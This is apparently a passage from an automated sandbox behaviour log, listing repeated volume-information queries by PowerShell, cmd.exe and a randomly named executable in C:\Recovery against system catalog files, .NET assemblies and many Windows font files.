                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
